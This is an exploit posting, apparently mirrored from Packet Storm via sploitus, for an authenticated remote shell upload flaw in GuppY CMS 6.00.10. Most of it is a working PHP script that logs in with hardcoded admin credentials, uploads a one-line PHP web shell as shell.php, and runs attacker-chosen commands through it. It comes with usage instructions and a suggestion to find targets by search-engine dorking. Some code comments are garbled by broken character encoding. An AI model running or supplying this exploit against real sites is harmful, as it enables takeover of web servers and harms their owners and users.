Share
## https://sploitus.com/exploit?id=PACKETSTORM:212244
=============================================================================================================================================
| # Title : GuppY CMS 6.00.10 php Code Execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.freeguppy.org/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.
[+] Improvements : (Related : https://packetstorm.news/files/id/168584/ Related CVE numbers: ) .
Fixed CURLOPT_* bugs.
Improved input checking (getopt).
Improved handling of cookie.txt using a temporary file.
Added urlencode($command) to ensure no problems with special characters.
Improved HTTP code checking and response more accurately.
[+] save code as poc.php.
[+] Usage : php poc.php -u http://target.org/ -c whoami
[+] PayLoad :
#!/usr/bin/php
<?php
$username = "Admin";
$password = "rose1337";
$options = getopt('u:c:');
if(empty($options['u']) || empty($options['c'])) {
die("\n GuppY 6.00.10 CMS Remote Code Execution \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n");
}
$target = $options['u'];
$command = $options['c'];
$cookie = tempnam(sys_get_temp_dir(), 'cookie_');
// ุชุณุฌูู ุงูุฏุฎูู ูู
ุดุฑู
$url = "{$target}guppy/connect.php";
$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
$curlObj = curl_init();
curl_setopt_array($curlObj, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => 1,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_POSTFIELDS => $postdata,
CURLOPT_POST => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 10,
CURLOPT_TIMEOUT => 10,
CURLOPT_COOKIEJAR => $cookie,
CURLOPT_COOKIEFILE => $cookie
]);
$result = curl_exec($curlObj);
// ุฑูุน Web Shell
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
$post = '------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="rep"
file
------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="ficup"; filename="shell.php"
Content-Type: application/x-php
<?php system($_GET["cmd"]); ?>
------WebKitFormBoundarygA1APFcUlkIaWal4--
';
$headers = [
'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
'User-Agent: Mozilla/5.0',
'Accept-Encoding: gzip, deflate',
'Accept-Language: en-US,en;q=0.9'
];
curl_setopt_array($curlObj, [
CURLOPT_URL => $url2,
CURLOPT_POSTFIELDS => $post,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true
]);
$data = curl_exec($curlObj);
// ุชูููุฐ ุงูุฃู
ุฑ
$shell = "{$target}guppy/file/shell.php?cmd=" . urlencode($command);
curl_setopt_array($curlObj, [
CURLOPT_URL => $shell,
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
CURLOPT_POST => false,
CURLOPT_RETURNTRANSFER => true
]);
$exec_shell = curl_exec($curlObj);
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
if ($code < 200 || $code >= 300) {
echo "\n[-] Something went wrong! HTTP Code: $code\n";
} else {
print("\n$exec_shell\n");
}
curl_close($curlObj);
unlink($cookie);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================